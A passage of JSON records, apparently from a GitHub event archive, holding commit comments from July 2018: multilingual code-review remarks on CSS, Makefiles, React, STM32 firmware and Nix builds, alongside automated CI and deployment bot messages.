{"id":"7908320101","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570637,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-02T18:44:10Z","updated_at":"2018-07-02T18:44:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:44:10Z"}
{"id":"7908320668","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570640,"position":5,"line":5,"path":"src/css/style.css","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:44:17Z","updated_at":"2018-07-02T18:44:17Z","author_association":"NONE","body":"Não há muitos problemas em usar id no css para estilização, porém prefira classes sempre que possível. Vc vai perceber que usar id gera uma variável global no navegador e isso pode dar ruim se alguém manipular."}},"created_at":"2018-07-02T18:44:17Z"}
{"id":"7908320925","type":"CommitCommentEvent","actor":{"login":"alexmozzhakov"},"repo":{"name":"bettercap/bettercap"},"payload":{"comment":{"id":29570641,"position":21,"line":33,"path":"network/net.go","commit_id":"54607993bab312185e411e40cc0a9a1e7a1278f9","created_at":"2018-07-02T18:44:20Z","updated_at":"2018-07-02T18:44:20Z","author_association":"CONTRIBUTOR","body":"Please document that alias must start with a letter or refactor it so it won't. "}},"created_at":"2018-07-02T18:44:20Z"}
{"id":"7908321470","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"MarcinML/modern_cpp"},"payload":{"comment":{"id":29570642,"position":4,"line":4,"path":"Makefile","commit_id":"0056c7f16e021d1e74c8f9425edc7c2cca67c2a6","created_at":"2018-07-02T18:44:27Z","updated_at":"2018-07-02T18:44:27Z","author_association":"NONE","body":"Jako sources zazwyczaj nazywa się same pliki *.cpp. Pliki *.hpp to tzw. headers i możesz utworzyć dla nich oddzielną zmienną, którą też dodasz w zależnościach."}},"created_at":"2018-07-02T18:44:27Z"}
{"id":"7908325962","type":"CommitCommentEvent","actor":{"login":"frogg"},"repo":{"name":"OasysFoundation/Oasys-Toolbox-React"},"payload":{"comment":{"id":29570652,"position":null,"line":null,"path":null,"commit_id":"f8382a8440a3997da06024b41353acecc81d1e23","created_at":"2018-07-02T18:45:23Z","updated_at":"2018-07-02T18:45:23Z","author_association":"MEMBER","body":"bad news – deployed on app.joinoasys but #81 still reproduces for me"}},"created_at":"2018-07-02T18:45:23Z"}
{"id":"7908326139","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"MarcinML/modern_cpp"},"payload":{"comment":{"id":29570653,"position":13,"line":13,"path":"Makefile","commit_id":"0056c7f16e021d1e74c8f9425edc7c2cca67c2a6","created_at":"2018-07-02T18:45:26Z","updated_at":"2018-07-02T18:45:26Z","author_association":"NONE","body":"To jest niebezpieczne. Usuwasz wszystko czego nazwa zaczyna się od modern, czyli jakby był tam plik modern.cpp to też zostałby usunięty."}},"created_at":"2018-07-02T18:45:26Z"}
{"id":"7908326187","type":"CommitCommentEvent","actor":{"login":"teleshoes"},"repo":{"name":"taffybar/taffybar"},"payload":{"comment":{"id":29570654,"position":null,"line":null,"path":null,"commit_id":"c235869350a74f829e49d94ccebca0df22643841","created_at":"2018-07-02T18:45:27Z","updated_at":"2018-07-02T18:45:27Z","author_association":"CONTRIBUTOR","body":"@IvanMalison finally tested out master. (it took a LONG time to rewrite all my gtk2hs stuff)\r\n\r\ntaffybar now crashes more or less constantly. (if i open a terminal and a firefox window, and switch back and forth between them, it crashes on average after 2 icon switches)\r\n\r\nim gonna try selectively reverting icon changes"}},"created_at":"2018-07-02T18:45:27Z"}
{"id":"7908329884","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"MarcinML/modern_cpp"},"payload":{"comment":{"id":29570665,"position":1,"line":1,"path":"Makefile","commit_id":"0056c7f16e021d1e74c8f9425edc7c2cca67c2a6","created_at":"2018-07-02T18:46:19Z","updated_at":"2018-07-02T18:46:19Z","author_association":"NONE","body":"Wiem że w przykładzie było CC i CFLAGS, ale tak się zwyczajowo odnosi to kompilatora języka C. W przypadku C++ używa się CXX i CXXFLAGS."}},"created_at":"2018-07-02T18:46:19Z"}
{"id":"7908331142","type":"CommitCommentEvent","actor":{"login":"pavelhoral"},"repo":{"name":"technobecet/skyrimse-preklad"},"payload":{"comment":{"id":29570671,"position":26,"line":21,"path":"script/compile.js","commit_id":"a0240aa358c6cca3be80b8112226ac3fdd795538","created_at":"2018-07-02T18:46:36Z","updated_at":"2018-07-02T18:46:36Z","author_association":"NONE","body":"If your source files are Skyrim SE, then those are UTF-8. Only the original Skyrim had different encoding."}},"created_at":"2018-07-02T18:46:36Z"}
{"id":"7908331781","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29570674,"position":null,"line":null,"path":null,"commit_id":"34ecb4e811c68d73fa0ff077f96076b72307bcce","created_at":"2018-07-02T18:46:45Z","updated_at":"2018-07-02T18:46:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T18:46:45Z"}
{"id":"7908331985","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29570677,"position":null,"line":null,"path":null,"commit_id":"8a17e8cd7b4d2111321e7c9ad5765379d6c49e06","created_at":"2018-07-02T18:46:48Z","updated_at":"2018-07-02T18:46:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-217](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-217).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-217-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-02T18:46:48Z"}
{"id":"7908334278","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570682,"position":3,"line":3,"path":"src/js/controllers/TodoController.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:47:17Z","updated_at":"2018-07-02T18:47:17Z","author_association":"NONE","body":"receber o document no construtor pode ser util em testes onde vc queria alterar o comportamento do `querySelector` (ou de qualquer outra função de document)."}},"created_at":"2018-07-02T18:47:17Z"}
{"id":"7908338103","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29570691,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T18:48:08Z","updated_at":"2018-07-02T18:48:08Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T18:48:08Z"}
{"id":"7908339040","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570694,"position":119,"line":119,"path":"src/HardwareLayout.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:48:20Z","updated_at":"2018-07-02T18:48:20Z","author_association":"COLLABORATOR","body":"Верно. Но эту схему мы будем использовать только для порта и DMA. А насчет названия - для меня этот метод имеет характер события (event). Поэтому префикс \"on\". Префикс \"dev\" многозначный.  Device? Develop :)? "}},"created_at":"2018-07-02T18:48:20Z"}
{"id":"7908339064","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29570695,"position":null,"line":null,"path":null,"commit_id":"0438fb44ad447a120caa3fa462a0b3ca094f7a7f","created_at":"2018-07-02T18:48:20Z","updated_at":"2018-07-02T18:48:20Z","author_association":"OWNER","body":"### Note from instructor\r\n\r\nIt's working correctly to use `this.state` inside `this.setState` and still does the incorrect way of doing that because setState actually is a method executed asynchronously by react which means you can't rely on this state being called inside setState to really reflect the latest version of the state if you called setState somewhere else in the application.\r\n\r\nBasically around the same time the average setState call might finished before this one so this state\r\nin here might not be correct.\r\n\r\nSo there's a better syntax for calling this setState.\r\n\r\nIf you plan on using this state inside of it and this is the functional form of the function syntax of it it looks like this:\r\n\r\n```\r\nthis.setState((prevState, props) => {\r\n      return {\r\n          showPersons: !doesShow,\r\n          toggleClicked: prevState.toggleClicked + 1\r\n      }\r\n})\t    \r\n```\r\n\r\nThe previous state which you can safely access then.\r\nBecause this definitely is the last state it had at this point of time.\r\nAnd any props you might have.\r\nAnd then the function body you have to return an object which is your updated state.\r\n\r\nSo there you now put in the old code we had but in there we no longer existing state tag we clicked\r\nbut previous state tag clicked and as I just said this is now safe to be accessed because previous state\r\ncan't be mutated from anywhere else in the app.\r\n\r\nThis is just a take away and a better way of mutating to state if you have the danger of interfering\r\nwith our state worsens course you wouldn't have had the danger here because we don't change target collect from anywhere else."}},"created_at":"2018-07-02T18:48:20Z"}
{"id":"7908339164","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29570697,"position":null,"line":null,"path":null,"commit_id":"fe9f4abec29b5b4bfe1742658f421642b35c3860","created_at":"2018-07-02T18:48:21Z","updated_at":"2018-07-02T18:48:21Z","author_association":"CONTRIBUTOR","body":"@matthewbauer It looks like this may have broken the ability to build certain Haskell programs. For example:\r\n\r\n```\r\nnix build darwin.pkgs.haskellPackages.hakyll\r\n```\r\n\r\nNow fails for me after this commit with `\"Arguments list too long\"`. Same happens with `git-annex`.\r\n\r\nI think both of those expressions were already very, very close to the line limit, and so this change added enough text to the compile line that it pushed them over the edge perhaps?"}},"created_at":"2018-07-02T18:48:21Z"}
{"id":"7908341737","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/vue-tips"},"payload":{"comment":{"id":29570703,"position":null,"line":null,"path":null,"commit_id":"d1a9d24cef70208c42c32bebcdc696ca008c00dd","created_at":"2018-07-02T18:48:55Z","updated_at":"2018-07-02T18:48:55Z","author_association":"OWNER","body":"https://css-tricks.com/intro-to-vue-5-animations/"}},"created_at":"2018-07-02T18:48:55Z"}
{"id":"7908346509","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570712,"position":38,"line":38,"path":"src/HardwareLayout/PortA.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:49:54Z","updated_at":"2018-07-02T18:49:54Z","author_association":"COLLABORATOR","body":"Все-таки, к событию. Я читаю это как \"Для PortA произошло событие включения тактирования\". "}},"created_at":"2018-07-02T18:49:54Z"}
{"id":"7908349595","type":"CommitCommentEvent","actor":{"login":"EmilChoparinov"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29570718,"position":108,"line":109,"path":"apps/game/AI_2.py","commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T18:50:34Z","updated_at":"2018-07-02T18:50:34Z","author_association":"OWNER","body":"🤔 "}},"created_at":"2018-07-02T18:50:34Z"}
{"id":"7908349753","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29570719,"position":56,"line":97,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T18:50:37Z","updated_at":"2018-07-02T18:50:37Z","author_association":"NONE","body":"You'd be surprised!\r\nDepends on driver version and manufacturer.\r\n\r\nMaybe loop unrolling can be controlled in the SPIR-V compiler... but it might not be explicitly controllable."}},"created_at":"2018-07-02T18:50:37Z"}
{"id":"7908350048","type":"CommitCommentEvent","actor":{"login":"BachirBichri"},"repo":{"name":"caouecs/Laravel-lang"},"payload":{"comment":{"id":29570721,"position":null,"line":null,"path":null,"commit_id":"e569ff65b0e87cac01ff2fbbb3904de6bee79490","created_at":"2018-07-02T18:50:41Z","updated_at":"2018-07-02T18:50:41Z","author_association":"NONE","body":"I tested it but it did not work. I can'n access to json items until i move the json file in resources/lang"}},"created_at":"2018-07-02T18:50:41Z"}
{"id":"7908355176","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"LordLukin/training"},"payload":{"comment":{"id":29570736,"position":null,"line":null,"path":null,"commit_id":"5bded3a5911b6fb4372d277b6126062473fa77b4","created_at":"2018-07-02T18:51:50Z","updated_at":"2018-07-02T18:51:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Post-work](https://trello.com/c/SUQioUQS/2-post-work)"}},"created_at":"2018-07-02T18:51:50Z"}
{"id":"7908356682","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29570745,"position":null,"line":null,"path":null,"commit_id":"fe9f4abec29b5b4bfe1742658f421642b35c3860","created_at":"2018-07-02T18:52:10Z","updated_at":"2018-07-02T18:52:10Z","author_association":"MEMBER","body":"Oh very weird! I didn't think this was causing it - @ericson2314 has made a few changes to the generic-builder.nix in:\r\n\r\n- 37eca93aab86a132d5c29f2d4cbe37f6493f03b7\r\n- d21653f465f5a9d9123ac4126fd0560cf74ab0cd\r\n- f8ec07e836dfd224c41216cbd82a8cfc3de50b8a\r\n- 529a0f74edc0b9a0e7f4cdb8932ac0b53f5179a0\r\n- eeeaab8d5e0eb262555313cbb6aaecd772cdc296\r\n\r\nThese seemed more likely - but maybe reverting this fix the issue? I didn't think libsecurity was pulled into haskell but I could be wrong."}},"created_at":"2018-07-02T18:52:10Z"}
{"id":"7908357568","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570749,"position":30,"line":30,"path":"src/HardwareLayout/PortH.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:52:21Z","updated_at":"2018-07-02T18:52:21Z","author_association":"COLLABORATOR","body":"Не понял вопрос. Какой атрибут? Вы про namespace в имени класса-родителя HardwareLayout::Port? В принципе, не нужен. Можно убрать."}},"created_at":"2018-07-02T18:52:21Z"}
{"id":"7908358272","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29570751,"position":null,"line":null,"path":null,"commit_id":"4ba6d6f92ad80d900f794a740bb5413a0ff0721f","created_at":"2018-07-02T18:52:30Z","updated_at":"2018-07-02T18:52:30Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-1](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-02T18:52:30Z"}
{"id":"7908358550","type":"CommitCommentEvent","actor":{"login":"coufo"},"repo":{"name":"MariaChrysafis/Summer2018"},"payload":{"comment":{"id":29570752,"position":null,"line":null,"path":null,"commit_id":"f6e633a27690206a401c796304244b554428a67b","created_at":"2018-07-02T18:52:35Z","updated_at":"2018-07-02T18:52:35Z","author_association":"NONE","body":"You need to use the `.cpp` extension"}},"created_at":"2018-07-02T18:52:35Z"}
{"id":"7908358628","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570753,"position":3,"line":3,"path":"src/js/models/Message.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:52:35Z","updated_at":"2018-07-02T18:52:35Z","author_association":"NONE","body":"Considere passar objetos para suas funções e pegar os campos via destructuring. Isso vai te ajudar se vc quiser/precisar trocar ordem/acrescentar parametros. Esse exemplo ficaria assim: \r\n\r\n```js\r\nconstructor({message = '', type = 'info'}) {\r\n   //....\r\n}\r\n```\r\n\r\nA chamada muda para: \r\n`new Message({message: 'Olar', type: 'info'})`"}},"created_at":"2018-07-02T18:52:35Z"}
{"id":"7908359458","type":"CommitCommentEvent","actor":{"login":"alisonjo2786"},"repo":{"name":"CU-CommunityApps/gold-bear"},"payload":{"comment":{"id":29570755,"position":null,"line":null,"path":null,"commit_id":"32ef0e307c9af2e4d4856ff5e597bacba86897c8","created_at":"2018-07-02T18:52:48Z","updated_at":"2018-07-02T18:52:48Z","author_association":"MEMBER","body":"Created multidev environment [gold-bear#ci-68](https://dashboard.pantheon.io/sites/b405a672-5bc8-475a-9593-90a1d3a16358#ci-68).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-68-gold-bear.pantheonsite.io/)"}},"created_at":"2018-07-02T18:52:48Z"}
{"id":"7908364196","type":"CommitCommentEvent","actor":{"login":"IvanMalison"},"repo":{"name":"taffybar/taffybar"},"payload":{"comment":{"id":29570763,"position":null,"line":null,"path":null,"commit_id":"c235869350a74f829e49d94ccebca0df22643841","created_at":"2018-07-02T18:53:53Z","updated_at":"2018-07-02T18:53:53Z","author_association":"MEMBER","body":"@teleshoes yeah I'm experiencing the same thing. I'm probably going to try to use valgrind to figure out what the source of these crashes are. In a way its better that they are happening this consistently because at least this way they are easy to reproduce."}},"created_at":"2018-07-02T18:53:53Z"}
{"id":"7908371210","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570776,"position":16,"line":16,"path":"src/js/models/TodoList.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:55:24Z","updated_at":"2018-07-02T18:55:24Z","author_association":"NONE","body":"só uma dica de js aqui, se vc fizer `this._list.length = 0;` ele vai limpar a lista. Js é :heart: "}},"created_at":"2018-07-02T18:55:24Z"}
{"id":"7908373400","type":"CommitCommentEvent","actor":{"login":"IvanMalison"},"repo":{"name":"taffybar/taffybar"},"payload":{"comment":{"id":29570780,"position":null,"line":null,"path":null,"commit_id":"c235869350a74f829e49d94ccebca0df22643841","created_at":"2018-07-02T18:55:53Z","updated_at":"2018-07-02T18:55:53Z","author_association":"MEMBER","body":"@teleshoes My hope is that the segfaults/memory leaks have to do with the interaction between gtk2hs and gi-gtk, and once we finish migrating the last few widgets to gi-gtk the issue will go away."}},"created_at":"2018-07-02T18:55:53Z"}
{"id":"7908374291","type":"CommitCommentEvent","actor":{"login":"trvrb"},"repo":{"name":"nextstrain/zika"},"payload":{"comment":{"id":29570782,"position":null,"line":null,"path":null,"commit_id":"5c4f6f6b682422f568280093d8548e7c77428d6f","created_at":"2018-07-02T18:56:07Z","updated_at":"2018-07-02T18:56:07Z","author_association":"MEMBER","body":"Very cool."}},"created_at":"2018-07-02T18:56:07Z"}
{"id":"7908375685","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570787,"position":1,"line":1,"path":"src/js/services/ProxyCreate.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:56:25Z","updated_at":"2018-07-02T18:56:25Z","author_association":"NONE","body":"Depois vc me explica essa classe pq eu quero entender a necessidade do reflect aqui ahuauhahua"}},"created_at":"2018-07-02T18:56:25Z"}
{"id":"7908376360","type":"CommitCommentEvent","actor":{"login":"orkunaryus"},"repo":{"name":"orkunaryus/yakacik"},"payload":{"comment":{"id":29570788,"position":null,"line":null,"path":null,"commit_id":"2e4c7233b129a776ae680ceb09a75cce8b0ff9a0","created_at":"2018-07-02T18:56:35Z","updated_at":"2018-07-02T18:56:35Z","author_association":"OWNER","body":"db sp con"}},"created_at":"2018-07-02T18:56:35Z"}
{"id":"7908377637","type":"CommitCommentEvent","actor":{"login":"yodadude2003"},"repo":{"name":"rainlabs/AndroidFlurryPlugin"},"payload":{"comment":{"id":29570792,"position":null,"line":null,"path":null,"commit_id":"fce594cadbc0288df662d9f03c6da208ff04d615","created_at":"2018-07-02T18:56:53Z","updated_at":"2018-07-02T18:56:53Z","author_association":"NONE","body":"Thank you so much for updating this. Totally saved my project 👍 "}},"created_at":"2018-07-02T18:56:53Z"}
{"id":"7908378060","type":"CommitCommentEvent","actor":{"login":"lrgm44"},"repo":{"name":"objetos-inter2018/Snowman"},"payload":{"comment":{"id":29570793,"position":63,"line":42,"path":"README.md","commit_id":"57f8988b822527871b6db46f88a55fb6ea65022a","created_at":"2018-07-02T18:56:59Z","updated_at":"2018-07-02T18:56:59Z","author_association":"CONTRIBUTOR","body":"[Luis Rodrigo Gómez Martínez](https://github.com/lrgm44)"}},"created_at":"2018-07-02T18:56:59Z"}
{"id":"7908379230","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570794,"position":18,"line":18,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:57:15Z","updated_at":"2018-07-02T18:57:15Z","author_association":"OWNER","body":"Não há um motivo específico. Apenas [copiei o código do blog do github ](https://blog.github.com/2008-12-19-github-ribbons/) e acrescentei ele no projeto. Mas realmente, isso não é legal. Vou remover esse estilo da tag `img` e acrescentar no `style.css`"}},"created_at":"2018-07-02T18:57:15Z"}
{"id":"7908386667","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570808,"position":52,"line":52,"path":"src/IOPort.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:58:58Z","updated_at":"2018-07-02T18:58:58Z","author_association":"COLLABORATOR","body":"На самом деле, я планировал использовать этот класс и для одного пина,  для набора пинов одного порта. Например, SDIO использует всего два порта - на одном пять пинов, на другом один. Вот я и буду одним вызовом setAlternate устанавливать флаг альтернативности для всех пяти пинов одновременно. Поэтому я пока тело этой процедуры вернул, но с ifdef"}},"created_at":"2018-07-02T18:58:58Z"}
{"id":"7908388491","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"BenzoRom/frameworks_base"},"payload":{"comment":{"id":29570814,"position":null,"line":null,"path":null,"commit_id":"96ad58b34eb7d1e50fce74e55d8f3ab306953c94","created_at":"2018-07-02T18:59:21Z","updated_at":"2018-07-02T18:59:21Z","author_association":"CONTRIBUTOR","body":"Patchset has been updated"}},"created_at":"2018-07-02T18:59:21Z"}
{"id":"7908391727","type":"CommitCommentEvent","actor":{"login":"chreekat"},"repo":{"name":"databrary/databrary"},"payload":{"comment":{"id":29570826,"position":169,"line":144,"path":"src/Model/Volume.hs","commit_id":"fa3bfc2cd696c33dcb10adedbc5eb261a662975a","created_at":"2018-07-02T19:00:05Z","updated_at":"2018-07-02T19:00:05Z","author_association":"MEMBER","body":"I just did the Monoid/Semigroup split (one of the things -Wcompat warns about): this was pure refactor with no change in behavior. The new `(<>)` has the same definition as the old `mappend`.\r\n\r\nWhether or not `(<>)` is  law-abiding is TBD. :)"}},"created_at":"2018-07-02T19:00:05Z"}
{"id":"7908393622","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29570835,"position":null,"line":null,"path":null,"commit_id":"cb51b446243a1c10f3bf2ac804ee5a1f05391732","created_at":"2018-07-02T19:00:29Z","updated_at":"2018-07-02T19:00:29Z","author_association":"MEMBER","body":"https://github.com/artix-linux/packages-galaxy/commit/72e73cc7d6d60e286a4dd60d00d6800602a1578c\r\n\r\nIts 2.130-1"}},"created_at":"2018-07-02T19:00:29Z"}
{"id":"7908395044","type":"CommitCommentEvent","actor":{"login":"Gabriel439"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29570841,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-02T19:00:47Z","updated_at":"2018-07-02T19:00:47Z","author_association":"COLLABORATOR","body":"@domenkozar: Yes, it is definitely possible.  However, I don't understand why the version of `dhall` Stackage uses matters to Nixpkgs"}},"created_at":"2018-07-02T19:00:47Z"}
{"id":"7908397781","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29570849,"position":null,"line":null,"path":null,"commit_id":"acd498e7eb5a8076db04fca70303e55a3a8104a4","created_at":"2018-07-02T19:01:22Z","updated_at":"2018-07-02T19:01:22Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-7](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-02T19:01:22Z"}
{"id":"7908400539","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570855,"position":148,"line":115,"path":"src/System.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T19:01:58Z","updated_at":"2018-07-02T19:01:58Z","author_association":"COLLABORATOR","body":"Не совсем так. См. схему тактирования F405:\r\n![i2sclock](https://user-images.githubusercontent.com/30557348/42181371-e5ac11e6-7e3a-11e8-8e6e-c3ec978127b7.png)\r\nПосмотрите еще раз на реализацию. Тактирование I2S - это часть PLL, поэтому параметры I2S нужно установить ДО вызова System->start()"}},"created_at":"2018-07-02T19:01:58Z"}
{"id":"7908402881","type":"CommitCommentEvent","actor":{"login":"RomainOC"},"repo":{"name":"Seiph59/Pharmacie"},"payload":{"comment":{"id":29570859,"position":58,"line":58,"path":"Pharmacie.py","commit_id":"f06e5a70dbbc14dc9ed8cdcce0c1913455a12076","created_at":"2018-07-02T19:02:30Z","updated_at":"2018-07-02T19:02:30Z","author_association":"NONE","body":"Tu n'as pas un type plus adapté pour retourner un \"trouvé\" ou un \"j'ai pas trouvé\" ?"}},"created_at":"2018-07-02T19:02:30Z"}
{"id":"7908403051","type":"CommitCommentEvent","actor":{"login":"romeshkosme"},"repo":{"name":"romeshkosme/recipes"},"payload":{"comment":{"id":29570860,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"f31f8bf4a707d63376df64e24246553bebc80076","created_at":"2018-07-02T19:02:32Z","updated_at":"2018-07-02T19:02:32Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-02T19:02:32Z"}
{"id":"7908403865","type":"CommitCommentEvent","actor":{"login":"Grimler91"},"repo":{"name":"termux/termux-root-packages"},"payload":{"comment":{"id":29570862,"position":null,"line":null,"path":null,"commit_id":"ac6aaaf8c5622d247c00ef6d0f536ac1e054b238","created_at":"2018-07-02T19:02:42Z","updated_at":"2018-07-02T19:02:42Z","author_association":"COLLABORATOR","body":"Ping @xeffyr, `gnupg-curl` wasn't a good idea, I've removed it from the readme of this repo."}},"created_at":"2018-07-02T19:02:42Z"}
{"id":"7908404036","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29570863,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T19:02:45Z","updated_at":"2018-07-02T19:02:45Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2928 of 2929 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-i386-Windows-7-VisualStudio-14.html'>![Test 